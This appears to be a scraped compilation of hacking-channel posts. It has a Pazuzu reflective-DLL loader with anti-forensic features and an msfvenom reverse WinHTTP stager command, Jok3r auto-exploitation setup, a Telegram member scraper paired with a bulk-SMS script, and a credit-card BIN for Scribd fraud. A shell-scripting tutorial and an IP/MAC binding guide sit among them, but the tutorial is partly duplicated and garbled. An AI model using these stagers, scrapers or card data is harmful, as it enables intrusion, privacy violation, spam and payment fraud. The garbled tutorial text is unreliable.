Pazuzu: Reflective DLL to run binaries from memory
> Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
fb.com/undercodeTesting
HOW AND WHY THIS SCRIPT:
The script Pazuzu.py takes as input the binary you want to run from memory (parameter -f). Depending on the properties of that binary, Pazuzu chooses one of the 3 DLLs currently available. These DLLs are:
1) reloc_x86.dll: runs the binary inside the address space of the current process. This is the most favorable option, since the binary generates the least "noise" on the system.
2) dforking_x86.dll: the binary also runs from memory, but through "process hollowing". This is the technique used by Meterpreter's "execute" command with the -m flag.
3) download_x86.dll: the noisiest option, since the binary is downloaded to disk and executed from there.
Pazuzu also provides some additional features. For example, the -x option encrypts the section containing the binary with a random RC4 key (stored in the DLL TimeStamp field). In addition, after the binary has run, the PE header of the DLL and the binary section are overwritten with zeros. I will add more anti-forensic techniques in future versions.
With the -p option the resulting DLL is patched with the bootstrap required to reach the ReflectiveLoader export (more info at www.shelliscoming.com). This is useful for not depending on the Metasploit handler to inject the DLL: if the DLL is already patched, it can be uploaded to a Web server so that the stager retrieves it from there (more anonymity).
HOW TO RUN:
1) git clone https://github.com/BorjaMerino/Pazuzu
2) cd Pazuzu
3) run Pazuzu.py with python, passing the binary to embed with -f
4) To get the Pazuzu DLL I will use a WinHTTP stager:
    root@kali:~# msfvenom -p windows/dllinject/reverse_winhttp lhost=192.168.1.44 lport=8080 dll=. -f exe -o Winhttp-stager.exe
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 908 bytes
    Saved as: Winhttp-stager.exe
@UndercodeTesting
SHELL PROGRAMMING FULL BY UNDERCODE:
instagram.com/UndercodeTesting
Shell programming
1) In DOS you may have routine, repetitive tasks. You write the repeated commands into a batch file, and executing the batch file executes those commands. Does UNIX have batch processing? Yes. UNIX has something like DOS batch files, but it is far more powerful and also more complicated, comparable to a general high-level language. In UNIX it is not called a batch file but a Shell Script.
2) In general a Shell Script has the same status as any other executable file (or command), except that a Shell Script is stored as a text file rather than a binary file. When a Shell Script is executed, some program must convert its contents into a series of commands to run, and that program is the Shell; this is why it is called a Shell Script (hereafter simply "Script"). Scripts for different shells differ, so a script written for shell A cannot be executed by shell B. The shells most commonly used on UNIX are the Bourne Shell and the C Shell, so this lesson introduces writing scripts for these two.
Set the text file as an executable Shell Script
Once the script is written, how do we make it executable? Because a Script is really an executable file, its access permissions must allow execution. The permissions are changed with the following commands:
chmod u+x filename    only the owner can execute it
chmod ug+x filename   the owner and members of the same group can execute it, others cannot
chmod +x filename     everyone can execute it
And how do we specify which shell should interpret the script? The basic rules are:
1) If the first non-blank character of the Script is not "#", the Bourne Shell is used.
2) If the first non-blank character of the Script is "#" but the file does not begin with "#!", the C Shell is used.
3) If the Script begins with "#!", whatever follows "#!" names the Shell to use, and the full path name must be given.
The third way is recommended, so that what runs is what you intended. The path name of the Bourne Shell is /bin/sh and that of the C Shell is /bin/csh.
1) Use Bourne Shell
    echo enter filename        or        #!/bin/sh
    .                                    .
    .                                    .
    .                                    .
2) Use C Shell
    # C Shell Script           or        #!/bin/csh
    .                                    .
    .                                    .
    .                                    .
The "#!" form works for any other interpreter as well, for example:
    #!/etc/perl
    .
    .
    .
Besides naming the shell inside the script, you can also force one from the command line. For example, to execute a script with the C Shell, issue this command:
csh filename
In this case the script does not need to be an executable file, and the shell named inside the script is ignored. This is discussed again later.
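As an added example (not part of the original post), the three interpreter-selection rules above written as a small sh function, run over constructed sample scripts that are also made executable with chmod u+x as described. The helper name guess_interpreter is my own; the rules it applies are exactly the three listed above.

```shell
#!/bin/sh
# Added example, not from the original post: applies the three interpreter
# selection rules to a file. guess_interpreter is a hypothetical helper and
# the sample scripts it runs on are constructed here.

# guess_interpreter FILE : print the interpreter the rules assign to FILE.
#   rule 3: file starts with "#!"         -> the path written after "#!"
#   rule 2: first non-blank char is "#"   -> /bin/csh
#   rule 1: anything else                 -> /bin/sh
guess_interpreter() {
    first2=`head -c 2 "$1"`
    if [ "$first2" = "#!" ]; then
        # print the rest of line 1, with blanks after "#!" dropped
        sed -n '1s/^#![[:space:]]*//p' "$1"
        return
    fi
    # drop all blanks and newlines, then look at the first remaining character
    firstchar=`tr -d ' \t\n' < "$1" | head -c 1`
    if [ "$firstchar" = "#" ]; then
        echo /bin/csh
    else
        echo /bin/sh
    fi
}

# Demonstration: three constructed scripts, one per rule, each made
# executable for its owner with chmod u+x, then classified.
demo_interpreter_rules() {
    dir=`mktemp -d`
    printf 'echo enter filename\n' > "$dir/bourne"
    printf '# C Shell Script\necho hello\n' > "$dir/cshell"
    printf '#!/bin/sh\necho hello\n' > "$dir/shebang"
    for f in bourne cshell shebang
    do
        chmod u+x "$dir/$f"
        echo "$f -> $(guess_interpreter "$dir/$f")"
    done
    rm -rf "$dir"
}

demo_interpreter_rules
```

Note that rule 3 is checked first and only on the first two bytes of the file: a "#!" that is preceded by a blank line is not a shebang, and under rule 2 such a file goes to the C Shell, which is exactly why the text recommends the explicit "#!" form.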
Script's basic structure and concept
A Script is line-oriented: the script we write is broken into lines and executed line by line. Each line can be a command, a comment, or a flow-control instruction. If a line is not finished, put a "\" at the end of the line; the next line is then joined onto it and treated as the same line, as follows:
    echo The message is \
    too long so we have \
    to split it into \
    several lines
When "#" appears in a Script, the rest of that line is a comment and the Shell does not interpret it.
The way to execute a command in a Script is the same as at the command line: it can run in the foreground or in the background, and environment variables may need to be set when running it.
The flow control of a Script is no different from that of general high-level languages, and it also has subroutines like them; these make Script more powerful.
To get the same effect as a high-level language we can also set variables in a Script, which makes Script a real high-level language.
Bourne Shell
1- Variables
The only variable type in the Bourne Shell is the string, so numerical operations must be done through external commands. Its variables fall into the following kinds:
1) User variables
These are the most frequently used variables; any string containing no whitespace can be used as a variable name. A variable is set as follows:
var=string
(no spaces around the "="). To access the variable, put a "$" in front of its name.
    name=undercode
    echo name
    echo $name
The result is as follows:
name
undercode
2) System variables (environment variables)
These are like user variables, but their value is passed on to the commands the script executes. To turn a user variable into a system variable, just add:
export var
    name=undercode
    export name
The following system variables are already set once the user has logged into the system:
$HOME        the user's home directory
$PATH        the directories searched when a command is executed
$TZ          time zone
$MAILCHECK   how many seconds between checks for new mail
$PS1         the prompt at the command line
$PS2         the prompt shown when a command is not yet complete and more input is required
$MANPATH     the search path of the man command
3) Read-only user variables
Like user variables, but their value cannot be changed. To make a user variable read-only, just add:
readonly var
If readonly is used with no argument, all read-only variables are listed. Another point: system variables cannot be made read-only.
    name=undercode
    readonly name
    echo $name
    name=John
    readonly
The result is as follows:
undercode
name: is read only
readonly name
readonly ......
4) Special variables
Some variables are set when the Script starts and cannot be modified. We do not call them read-only system variables but special variables (some books do call them read-only system variables), because they exist only while the program is executing and a user cannot make an ordinary system variable read-only. These variables are:
$0   the name under which this program was executed
$n   the n-th parameter of this program, n = 1..9
$*   all parameters of this program
$#   the number of parameters of this program
$$   the PID of this program
$!   the PID of the last command run in the background
$?   the return value of the last command executed
When the program is run with more than nine parameters, the shift command moves the parameters forward one position, so the 10th and later parameters can be reached. We can also change $n and $* with the set command, as follows:
set string
The value of $* is then string, which is split into words and placed into $n. If set is given no parameters, all the variables that have been set and their values are listed.
File name: ex1   Parameters: this is a test
    echo Filename: $0
    echo Arguments: $*
    echo No. of args.: $#
    echo 2nd arg.: $2
    shift
    echo No. of args.: $#
    echo 2nd arg.: $2
    set hello, everyone
    echo Arguments: $*
    echo 2nd arg.: $2
The results are as follows:
Filename: ex1
Arguments: this is a test
No. of args.: 4
2nd arg.: is
No. of args.: 3
2nd arg.: a
Arguments: hello, everyone
2nd arg.: everyone
It is worth mentioning that when you want to read a variable value from the keyboard, you can use the following command:
read var1 var2 .....
read assigns one word to each variable. If more words are entered than there are variables, the last variable receives all the remaining words; if fewer words are entered than there are variables, the remaining variables are set to the empty string. For numerical operations we can use the expr command; its parameters and output are listed in Appendix A.
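As an added example (not from the original post), the variable rules above exercised from sh functions: reaching a parameter beyond $9 with shift, resetting the parameters with set, read with more or fewer words than variables, the readonly refusal, and the difference an export makes to a child process. The function names are my own; nth_arg, count_words, third_word and the rest do not exist in any tool the post describes.

```shell
#!/bin/sh
# Added example, not from the original post: the variable rules above as
# functions that print their result so a caller can check it.

# nth_arg N ARG... : print the N-th argument, even for N > 9, by shifting the
# positional parameters N-1 times (the text's way past $9).
nth_arg() {
    n=$1
    shift
    while [ "$n" -gt 1 ]; do
        shift
        n=`expr $n - 1`      # arithmetic via expr; never reaches 0 here
    done
    echo "$1"
}

# count_words STRING : reset the positional parameters with set, then $# is
# the number of words the string was split into.
count_words() {
    set -- $1              # "--" keeps a word such as -x from being taken as an option
    echo $#
}

# third_word LINE : read LINE into three variables and print the third one;
# extra words collect in it, missing words leave it empty.
third_word() {
    read var1 var2 var3 <<EOF
$1
EOF
    echo "$var3"
}

# readonly_rejects_assignment : the readonly experiment from the text, run in a
# subshell so the caller's variables are untouched; prints "yes" when the
# later assignment is refused.
readonly_rejects_assignment() {
    ( name=undercode; readonly name; name=John ) 2>/dev/null && echo no || echo yes
}

# exported_reaches_child : only an exported variable is visible to a child
# process; prints what the child sees for each case.
exported_reaches_child() {
    plain=undercode
    child=undercode
    export child
    sh -c 'echo "plain=$plain child=$child"'
}

# Demonstration when run directly
nth_arg 11 a b c d e f g h i j k l
count_words "this is a test"
third_word "one two three four"
third_word "one"
readonly_rejects_assignment
exported_reaches_child
```

The unquoted $1 in count_words is deliberate: word splitting is what turns the string into separate parameters. Anywhere a value must stay one word (a file name with spaces, user input), quote it instead.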
2- Run
The Bourne Shell has five ways to execute a command, and the results differ slightly between them.
1) Direct command
The command is typed as is and behaves exactly as at the command line.
2) Use the sh command
sh command
The file must be a Bourne Shell Script, but it does not have to be executable. Otherwise this is the same as a direct command.
3) Use the "." command
. command
This is like the sh command, except that it does not start a new process the way sh does: the work is done inside the current process.
4) Use the exec command
exec command
The script is replaced by the executed command; when that command finishes, the script ends too.
5) Command substitution
This is a very useful method. If you want the output of one command to become a parameter of another command, you must use it. Place the command between two "`" signs, and the Shell replaces the command and the two "`" signs with the output of that command.
str="Current directory is `pwd`"
echo $str
The result is as follows:
Current directory is /users/cc/mgtsai
This means the pwd command output "/users/cc/mgtsai", and that whole string replaced the original `pwd` when the str variable was set, so the content of str is the output of pwd.
number=`expr $number + 1`
This is the method for numerical operations mentioned above. Basically, the expr command only evaluates the expression and writes the result to standard output; to store that value in a variable you must rely on command substitution. In this example 1 is added to the value of the number variable and the result is saved back into number.
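As an added example (not from the original post), the ways of running a command above compared side by side: "." keeps the variables a script sets, "sh" runs it in a child where they are lost, exec replaces the running shell, and command substitution with expr does the arithmetic. The throwaway script and the function names are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post: the five ways of running a
# command above, written as functions so the differences can be checked.
# Function names and the throwaway script are constructed for this example.

# make_script : write a one-line script that sets a variable; print its path.
make_script() {
    f=`mktemp`
    printf 'greeting=hello_from_script\n' > "$f"
    echo "$f"
}

# run_with_dot : "." runs the file in the current process, so the variable it
# sets is still there afterwards. (The same property means a sourced file can
# change anything in your shell, so only source files you trust.)
run_with_dot() {
    f=`make_script`
    greeting=unset
    . "$f"
    rm -f "$f"
    echo "$greeting"
}

# run_with_sh : "sh file" runs in a new process (the file need not be
# executable); the variable it sets never reaches the caller.
run_with_sh() {
    f=`make_script`
    greeting=unset
    sh "$f"
    rm -f "$f"
    echo "$greeting"
}

# run_with_exec : exec replaces the running script with the command, so the
# second echo is never reached.
run_with_exec() {
    sh -c 'exec echo replaced; echo never printed'
}

# increment N : command substitution with expr, as in number=`expr $number + 1`.
# Note that expr exits with status 1 when its result is 0, which matters under set -e.
increment() {
    number=$1
    number=`expr $number + 1`
    echo "$number"
}

# describe_dir DIR : the "Current directory is `pwd`" example for any directory,
# run in a subshell so the caller's working directory does not change.
describe_dir() {
    ( cd "$1" && str="Current directory is `pwd`" && echo "$str" )
}

run_with_dot
run_with_sh
run_with_exec
increment 41
describe_dir /
```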
3- Flow control
Before introducing flow control, let us look at the test command. The parameters of the test command form a condition; when the condition is true a non-zero value is returned, and when it is false zero is returned. All flow control relies on the test command to decide truth. The use of the test command is listed in Appendix B.
test $# = 0
If the program was run with no parameters, a non-zero value is returned, representing "$# = 0"; otherwise zero is returned.
The following describes the various flow-control forms:
1) if then. Syntax (flow chart: evaluate condition; if TRUE run then-commands, if FALSE skip them):
if (condition)
then
    then-commands
fi
condition is a test command; the conditions in all the forms introduced below are test commands.
File name: chkarg
    if (test $# != 0)
    then
        echo Arg1: $1
    fi
$ chkarg Hello
Arg1: Hello
$ chkarg
$
2) if then else. Syntax (flow chart: condition TRUE runs then-commands, FALSE runs else-commands):
if (condition)
then
    then-commands
else
    else-commands
fi
3) if then elif. Syntax (flow chart: condition1 TRUE runs commands1; otherwise condition2 TRUE runs commands2; otherwise commands3):
if (condition1)
then
    commands1
elif (condition2)
then
    commands2
else
    commands3
fi
    echo "word 1: \c"
    read word1
    echo "word 2: \c"
    read word2
    echo "word 3: \c"
    read word3
    if (test "$word1" = "$word2" -a "$word2" = "$word3")
    then
4) for in. Syntax (flow chart: while arg-list still has items, take the next one into var and run commands):
for var in arg-list
do
    commands
done
    for a in xx yy zz
    do
        echo $a
    done
The result is as follows:
xx
yy
zz
5) for. Syntax (flow chart: while the parameters still have items, take the next one into var and run commands):
for var
do
    commands
done
File name: lstarg
    for a
    do
        echo $a
    done
$ lstarg xx yy zz
xx
yy
zz
6) while. Syntax (flow chart: evaluate condition; while it is TRUE run commands and test again):
while (condition)
do
    commands
done
    number=0
    while (test $number -lt 10)
    do
        echo "$number\c"
        number=`expr $number + 1`
    done
    echo
The result is as follows:
0123456789
7) until. Syntax (flow chart: evaluate condition; while it is FALSE run commands and test again):
until (condition)
do
    commands
done
The only difference from while is that while runs the loop while the condition is true, whereas until runs the loop while the condition is false.
8) break and continue
Both are used inside for, while, until and the other loop controls. break jumps to after done (leaving the loop), while continue jumps to done and goes on with the next iteration of the loop.
9) case. Syntax (flow chart: compare str with pat1, pat2, pat3 in turn and run the commands of the first pattern that matches):
case str in
    pat1) commands1 ;;
    pat2) commands2 ;;
    pat3) commands3 ;;
esac
Besides a fixed string, pat may use the following pattern forms:
*        any string
?        any single character
[abc]    one of the three characters a, b or c
[a-n]    any one character from a to n
|        multiple alternatives
    echo "Enter A, B, or C: \c"
    read letter
    case $letter in
        A|a) echo "You entered A." ;;
        B|b) echo "You entered B." ;;
        C|c) echo "You entered C." ;;
        *)   echo "Not A, B, or C" ;;
    esac
Written by undercode
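As an added example (not part of the post above), each flow-control form from the lesson as a small sh function whose output can be checked: the three-word comparison, the while/expr counter, an until countdown, for over the parameters, break and continue, and the case patterns. One caveat worth having in hand for the test command: it exits with status 0 when its condition holds and 1 when it does not, and that zero status is what if, while and until look for; test_status below prints the real value. Function names are my own, and printf replaces echo "\c" because echo's handling of \c differs between implementations.

```shell
#!/bin/sh
# Added example, not from the original post: the test command and each
# flow-control form above as functions. Function names are constructed for
# this example; printf stands in for echo "\c".

# test_status EXPR... : run test on the arguments and print its exit status
# (0 when the condition holds, 1 when it does not).
test_status() {
    if test "$@"
    then status=$?
    else status=$?
    fi
    echo $status
}

# all_equal A B C : the three-word comparison from the if-then-else example.
# Quoting every operand keeps test well-formed even when a word is empty.
all_equal() {
    if (test "$1" = "$2" -a "$2" = "$3")
    then echo same
    else echo different
    fi
}

# count_to N : the while/expr counter, digits printed on one line.
count_to() {
    number=0
    while (test $number -lt $1)
    do
        printf '%s' "$number"
        number=`expr $number + 1`
    done
    echo
}

# countdown_until N : the same idea with until, which loops while the
# condition is FALSE and stops as soon as n reaches 0.
countdown_until() {
    n=$1
    out=
    until (test $n -le 0)
    do
        out="$out$n"
        n=`expr $n - 1 || true`    # expr exits 1 when the result is 0; keep going
    done
    echo "$out"
}

# join_args ARG... : for over the positional parameters (lstarg), joined
# with commas so the result is a single checkable word.
join_args() {
    out=
    for a
    do
        if (test -z "$out")
        then out=$a
        else out="$out,$a"
        fi
    done
    echo "$out"
}

# first_over LIMIT ARG... : break and continue in a for loop: skip values
# not above LIMIT, print the first one that is, then leave the loop.
first_over() {
    limit=$1
    shift
    for a
    do
        if (test $a -le $limit); then continue; fi
        echo "$a"
        break
    done
}

# classify WORD : the case patterns listed above (*, ?, [abc], [a-n], |).
classify() {
    case $1 in
        A|a)   echo "letter A" ;;
        [bc])  echo "b or c" ;;
        [d-n]) echo "d through n" ;;
        ?)     echo "some other single character" ;;
        *)     echo "not a single character" ;;
    esac
}

test_status 3 -gt 1
all_equal x x x
count_to 10
countdown_until 5
join_args xx yy zz
first_over 5 1 9 3 7
classify k
```

The parentheses around each test call follow the lesson's own style; they run test in a subshell and are not required, and plain `if test ...` is the more common form.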
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
read word1
echo '' word 2: c ''
read word2
echo '' word 3: c ''
read word3
if (test "" $ word1 "" = "" $ word2 "" -a ""$ word2" "=" "$ word3" ")
then
The for-in syntax is as follows (flow chart: take the next item from arg-list and put it in the variable var, run the commands, and repeat until there is nothing left in arg-list):
for var in arg-list
do
    commands
done
Example:
for a in xx yy zz
do
    echo $a
done
The result is as follows:
xx
yy
zz
5) The syntax of for without an in-list is as follows (flow chart: take the next positional parameter and put it in the variable var, run the commands, and repeat until there are no parameters left):
for var
do
    commands
done
File name: lstarg
for a
do
    echo $a
done
$ lstarg xx yy zz
xx
yy
zz
6) The syntax of while is as follows (flow chart: test the condition; while it is TRUE, run the commands and test again; when it is FALSE, leave the loop):
while (condition)
do
    commands
done
Example (the \c in the echo suppresses the newline, so the numbers print on one line):
number=0
while (test $number -lt 10)
do
    echo "$number\c"
    number=`expr $number + 1`
done
echo
The result is as follows:
0123456789
7) The syntax of until is as follows (flow chart: test the condition; while it is FALSE, run the commands and test again; when it is TRUE, leave the loop):
until (condition)
do
    commands
done
The only difference between it and while is that while executes the loop body while the condition is true, whereas until executes the loop body while the condition is false.
8) break and continue
Both break and continue are used inside for, while, until and the other loop control structures. break jumps to the statement after done (leaving the loop), while continue jumps to done and carries on with the next iteration of the loop.
9) The case syntax is as follows (flow chart: compare str with pat1, pat2, pat3 in turn; on the first match run the corresponding commands and leave the case; if nothing matches, nothing is run):
case str in
pat1) commands1 ;;
pat2) commands2 ;;
pat3) commands3 ;;
esac
In addition, pat can be a specific string or a pattern. The pattern characters are as follows:
* any string
? any single character
[abc] any one of the three characters a, b or c
[a-n] any one character from a to n
| multiple choice (either pattern matches)
Example:
echo "Enter A, B, or C: \c"
read letter
case $letter in
    A|a) echo "You entered A." ;;
    B|b) echo "You entered B." ;;
    C|c) echo "You entered C." ;;
    *)   echo "Not A, B, or C" ;;
esac
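The following is an added example, not part of the original post, that puts break, continue and every case pattern form from items 8 and 9 into one script: classify() labels a single argument with the patterns listed above (*, ?, [abc], [a-n], |), and label_args() walks its arguments, skipping comment-like ones with continue and stopping at the word "end" with break. The function names and sample inputs are constructed for this example.

```shell
# Added example (not from the original post): case patterns, break and continue.

# Print a label for the first case pattern that matches $1.
classify() {
    case "$1" in
        [abc])   echo "one of a, b or c" ;;             # [abc]: one of three characters
        [a-n])   echo "one letter from a to n" ;;        # [a-n]: one character in a range
        ?)       echo "some other single character" ;;   # ?: exactly one character
        yes|no)  echo "a yes-or-no word" ;;              # |: alternative patterns
        *)       echo "any other string" ;;              # *: anything at all
    esac
}

# Number and label every argument up to "end", skipping arguments that start
# with '#'. Demonstrates "for var" over the positional parameters (item 5),
# continue (jump to done, next argument) and break (leave the loop past done).
label_args() {
    i=0
    for arg
    do
        case "$arg" in
            \#*) continue ;;   # continue: skip this argument, take the next one
            end) break ;;      # break: stop processing, nothing after "end" is seen
        esac
        i=`expr $i + 1`
        echo "$i: $arg -> `classify "$arg"`"
    done
}

# Sample run with constructed input: prints two labelled lines and stops at "end".
label_args b '#skipped' hello end never
```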
Written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FASTEST WAY TO LEARN - + SOME TRICK TO SPEED UP
> SHELL PROGRAMMING FULL BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Updated popular tool for Network and Web Pentest Automation Framework :-INCLUDE CVE-
for any linux
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
FEATURES :
1) Network Infrastructure Security Assessment
2) Many supported Services: Target most common TCP/UDP services (HTTP, FTP, SSH, SMB, Oracle, MS-SQL, MySQL, PostgreSQL, VNC, etc.).
3) Combine Power of Tools: Each security check is performed by a tool from the toolbox. Attacks are performed by chaining security checks.
4) Context Awareness: Security checks to run are selected and adapted according to the context of the target (i.e. detected technologies, credentials, vulnerabilities, etc.).
5) Reconnaissance: Automatic fingerprinting (product detection) of targeted services is performed.
6) CVE Lookup: When product names and their versions are detected, a vulnerability lookup is performed on online CVE databases (using Vulners & CVE Details).
7) Vulnerability Scanning: Automatically check for common vulnerabilities and attempt to perform some exploitations (auto-pwn).
8) Brute-force Attack: Automatically check for default/common credentials on the service and perform a dictionary attack if necessary.
9) Wordlists are optimized according to the targeted services.
10) Post-authentication Testing: Automatically perform some post-exploitation checks when valid credentials have been found.
π¦ Web Security Assessment
1) Large Focus on HTTP: More than 60 different security checks targeting HTTP supported for now.
2) Web Technologies Detection: A fingerprinting engine based on Wappalyzer is run prior to the security checks, allowing it to detect the programming language, framework, JS library, CMS, and web & application server.
3) Server Exploitation: Automatically scan and/or exploit most critical vulnerabilities (e.g. RCE) on web and application servers (e.g. JBoss, Tomcat, Weblogic, Websphere, Jenkins, etc.).
4) CMS Vulnerability Scanning: Automatically run vulnerability scanners on most common CMS (Wordpress, Drupal, Joomla, etc.).
π¦ Local Database & Reporting
1) Local Database: Data related to targets is organized by missions (workspaces) into a local SQLite database that is kept updated during security testing.
2) Metasploit-like Interactive Shell: Access the database through an interactive shell with several built-in commands.
3) Import Targets from Nmap: Add targets to a mission either manually or by loading Nmap results.
4) Import Targets from Shodan: Add targets to a mission manually from Shodan (needs a Shodan API key).
5) Access all Results: All outputs from security checks, detected credentials and vulnerabilities are stored in the database and can be accessed easily.
6) Reporting: Generate full HTML reports with a targets summary, web screenshots and all results from security testing.
π¦πβπππΈπππππΈπππβ & βπβ :
Pull Jok3r Docker Image:
1) git clone https://github.com/koutto/jok3r
2) cd jok3r
3) sudo docker pull koutto/jok3r
π¦ Run fresh Docker container:
1) sudo docker run -i -t --name jok3r-container -w /root/jok3r -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix --shm-size 2g --net=host koutto/jok3r
Notes:
-e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix is required in order to be able to start GUI applications from the Docker container (e.g. open a web browser to read reports). It requires running xhost +local:root on the host.
--shm-size 2g is used to increase the size of the shared memory; it is required to avoid crashes of the web browser when reading reports from the Docker container.
--net=host is required to share the host's network interface. It is needed for reverse connections (e.g. a ping back to the container when testing for RCE, or getting a reverse shell).
2) To re-run a stopped container:
sudo docker start -i jok3r-container
3) To open multiple shells inside the container:
sudo docker exec -it jok3r-container bash
π¦COMMANDS :
GitHub - koutto/jok3r: Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework
Show all the tools in the toolbox:
python3 jok3r.py toolbox --show-all
Install all the tools in the toolbox (already done in Docker container):
python3 jok3r.py toolbox --install-all --auto
Update all the tools in the toolbox and prompt each time to check update:
python3 jok3r.py toolbox --update-all
Update all the tools in the toolbox without any prompt:
python3 jok3r.py toolbox --update-all --auto
Information
List supported services:
python3 jok3r.py info --services
Show security checks for a given service:
python3 jok3r.py info --checks <service>
Show supported attack profiles for a given service:
python3 jok3r.py info --attack-profiles <service>
Show supported products for all services:
python3 jok3r.py info --products
π¦Tested by Undercode
enjoy
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network filtering-set up IP and MAC binding on Linux routing by undercode :
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
Some systems have the following requirement: a set of IP addresses is allowed to reach the Internet, and these IP addresses must not be stolen by illegitimate users. This can be achieved with the following solution:
1) First use ipchains or iptables to allow only the legitimate IP addresses to connect, and then establish an IP/MAC binding for each legitimate IP. To discuss this we first need to understand how the ARP protocol works. ARP is the abbreviation of Address Resolution Protocol; its function and working principle are as follows.
2) In low-level network communication, two nodes that want to talk to each other must first know the MAC addresses of the source and the destination. So that the system can quickly find the MAC address of a remote node, each local kernel maintains a lookup table called the ARP cache. It contains a list that maps the IP address of each remote host to its corresponding MAC address. The ARP cache is a data structure resident in memory, and its contents are managed and maintained by the kernel of the local system.
3) By default, the IP address (and corresponding MAC address) of any node the local system has communicated with in the last ten minutes is retained in the ARP cache.
4) When the MAC address of a remote host exists in the local host's ARP cache, converting the remote node's IP address to a MAC address is no problem. In many cases, however, the MAC address of the remote host is not in the local ARP cache.
5) What does the system do then? When the IP address of a remote host is known but its MAC address is not in the local ARP cache, the following process is used to obtain the MAC address of the remote node:
6) The local host sends a broadcast packet to all nodes on the network, asking which of them has the IP address in question. One node (and only one) answers this ARP broadcast, and the response packet contains the MAC address of the remote host. After receiving this reply, the local node records the MAC address of the remote node in its local ARP cache.
7) If we establish a fixed IP/MAC correspondence, that is, a static MAC entry for each legitimate IP address, then even if an illegitimate user steals one of those IP addresses, the Linux router, when responding to requests from that IP,
8) will not query its MAC address through the ARP protocol but will send the response data to the static MAC address configured on Linux. In this way,
9) the IP thief never receives the response data and so cannot use the network services.
10) The method of establishing the static IP/MAC binding is to create the file /etc/ethers, which contains the correct IP/MAC correspondences in the following format:
192.168.2.32 08:00:4E:B0:24:47
and then add at the end of /etc/rc.d/rc.local:
arp -f
11) iptables on 2.4 kernels can match on the IP address and the MAC address at the same time; use this function to restrict the rules for the legitimate IPs to both the IP address and the MAC address.
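As an added example (not part of the original post), the script below builds both bindings from items 10 and 11 out of one /etc/ethers-style file: the static ARP entries that arp -f would load, and iptables rules using the mac match module (-m mac --mac-source) that accept a listed IP only when it arrives from its bound MAC and drop everything else on the LAN interface. The commands are printed for review rather than executed; the interface name and the sample file contents are constructed.

```shell
# Added example (not from the original post): static ARP entries and IP+MAC
# iptables rules generated from an /etc/ethers-style file.

# Constructed sample in the /etc/ethers format shown above (IP then MAC).
SAMPLE_ETHERS='192.168.2.32 08:00:4E:B0:24:47
192.168.2.33 08:00:4e:b0:24:48
# comment lines and blank lines are ignored

'

# Print the IP/MAC pairs of FILE, one per line, with the MAC in upper case.
ethers_pairs() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' |
    while read -r ip mac _; do
        printf '%s %s\n' "$ip" "$(printf '%s' "$mac" | tr 'a-f' 'A-F')"
    done
}

# Static ARP entries: the per-entry equivalent of "arp -f FILE".
gen_static_arp() {
    ethers_pairs "$1" | while read -r ip mac; do
        echo "arp -s $ip $mac"
    done
}

# iptables rules for the LAN interface IFACE (default eth0): a listed IP is
# accepted only from its bound MAC; an unlisted IP, or a listed IP arriving
# from another MAC, falls through to DROP.
gen_ipmac_rules() {
    file="$1"; iface="${2:-eth0}"
    echo "iptables -N IPMAC 2>/dev/null || iptables -F IPMAC"
    ethers_pairs "$file" | while read -r ip mac; do
        echo "iptables -A IPMAC -s $ip -m mac --mac-source $mac -j RETURN"
    done
    echo "iptables -A IPMAC -j DROP"
    echo "iptables -I INPUT -i $iface -j IPMAC"
    echo "iptables -I FORWARD -i $iface -j IPMAC"
}

# Sample run on the constructed file (written to a temporary path).
demo_file=$(mktemp)
printf '%s' "$SAMPLE_ETHERS" > "$demo_file"
gen_static_arp "$demo_file"
gen_ipmac_rules "$demo_file" eth1
rm -f "$demo_file"
```

Pipe the printed commands into sh only after checking them; a typo in the bound MAC locks that host out rather than protecting it.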
---
end
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated telegram group scraper tool. fetch all information about group members
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) pkg install -y git python
2) $ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git
3) $ cd TeleGram-Scraper
π¦ Install requirements
1) $ python3 setup.py -i
2) set up the configuration file ( apiID, apiHASH )
$ python3 setup.py -c
π¦ To Generate User Data
1) $ python3 scraper.py
( members.csv is the default output; if you changed the name, use that one )
2) Send Bulk sms To Collected Data
$ python3 smsbot.py members.csv
3) Update Tool
$ python3 setup.py -u
π¦Tested by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Shell programming example-a simple directory menu
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
# Print the menu and read a choice; the loop ends when the choice is 5.
until
    echo List Directory..........1
    echo Change Directory........2
    echo Edit File...............3
    echo Remove File.............4
    echo Exit Menu...............5
    read choice
    test "$choice" = 5
do
    case $choice in
    1) ls ;;
    2) echo Enter target directory
       read dir
       cd $dir
       ;;
    3) echo Enter file name
       read file
       vi $file
       ;;
    4) echo Enter file name
       read file
       rm $file
       ;;
    q|Q|5) echo Goodbye; break ;;   # q or Q also leave the menu
    *) echo illegal Option ;;
    esac
done
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Tested SCRIBD BINS :
530795x6xxx34xx0
FECHA: RND
CVV:RND
IP: USA
use for learn not for steal
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 best twitter bots :
twitter.com/undercodeNews :
1) @HundredZeros
